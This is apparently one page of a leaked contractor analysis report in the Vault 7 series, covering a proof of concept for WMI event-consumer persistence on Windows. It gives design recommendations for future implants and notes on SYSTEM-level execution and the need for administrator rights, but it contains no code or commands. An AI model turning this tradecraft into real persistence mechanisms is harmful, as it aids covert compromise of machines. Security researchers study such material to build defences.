Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

UNCLASSIFIED
Analysis Report
WMI Persistence Proof of Concept – Supplemental Report
(U) Because the description of the method varies from one webpage to the
next, we performed significant testing before determining that the ASCII text
support is either incorrect or bugged to the point that it does not work. For
example, the exact same file that succeeds with mofcomp.exe and
IMofCompiler::CompileFile inexplicably fails with
IMofCompiler::CompileBuffer. Various methods were attempted in an effort to
get IMofCompiler:CompileBuffer working; however, none succeeded. Adding
to the confusion, the error messages returned in this process did not provide
line numbers and were generally completely undescriptive.
(U) The problems described above lead to the PoC being implemented in a
way that accepts an ASCII (B)MOF file and installs it into the WMI database.
With this in mind, we believe that embedding a BMOF file as a resource and
unpacking it to a buffer to feed IMofCompiler::CompileBuffer constitutes the
best functionality for future implementations. Furthermore, we believe future
implementations should also contain the option of specifying a file to compile
and / or install.
(U) During testing, Blackbird found that all tasks performed by the event
consumer were run as the SYSTEM user and were executed on the SYSTEM
desktop. For instance, when calc.exe was the command performed by the
event consumer, calc.exe would not be drawn on the user’s desktop and
could only be seen if the desktop context was switched to the SYSTEM
desktop.
(U) Also during testing, Blackbird found that the IMofCompiler interface
methods appear to require Administrator rights in order to run successfully.
We did test different security levels during COM initialization, but were
ultimately unable to bypass this step. Despite that, Blackbird believes that a
security context may yet exist that bypasses the need for elevated
credentials.
(U) During research, Blackbird would also like to highlight the Microsoft WMI
Tools utility that we believe is essential to future development and testing for
any programs with similar implementations to this one.
Raytheon Blackbird Technologies, Inc.
5
26 June 2015
Use or disclosure of data contained on this sheet is subject to the restrictions on the title page of this document.
UNCLASSIFIED

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh